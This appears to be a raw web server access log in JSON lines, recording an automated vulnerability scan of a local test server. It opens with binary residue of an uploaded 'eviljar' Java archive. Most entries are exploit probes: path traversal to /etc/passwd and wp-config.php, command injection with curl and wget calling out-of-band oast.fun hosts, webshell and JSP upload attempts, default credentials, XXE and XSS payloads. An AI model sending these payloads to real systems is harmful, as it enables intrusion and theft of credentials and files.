\x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/options HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mgmt/tm/sys/management-ip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652851463\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652851463\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tips/tipsLogin.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/workspace.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"sondata[ip]=a|curl ca285tosmpvbafqg07h0mogtopescpxu1.oast.fun&jsondata[type]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/ping.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/coverage.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.development.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ioncube/loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fpui/jsp/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229KAXw0YBgc2OEQVX1tH3bnqonS.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29KAXw0YBgc2OEQVX1tH3bnqonS&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_name\x22\x0D\x0A\x0D\x0A29KAXvLskm8MBXmG9tABDtnySlM\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_edit_mode\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_front\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_password_changed\x22\x0D\x0A\x0D\x0Afalse\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g\x0D\x0AContent-Disposition: form-data; name=\x22ks_filename\x22; filename=\x2229KAXvLskm8MBXmG9tABDtnySlM.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-2894\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A------WebKitFormBoundaryuim0dyiDSPBPu31g--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ws_utc/resources/setting/keystore HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/snapshots/:key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor/ckeditor/samples/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/release.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://ca285tosmpvbafqg07h0h69whrkurod4r.oast.fun; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.324","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.production.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /loader-wizard.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:23 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logos_clients/1.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.hg/hgrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ckeditor/samples/sample_posteddata.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"csrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/pr.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true 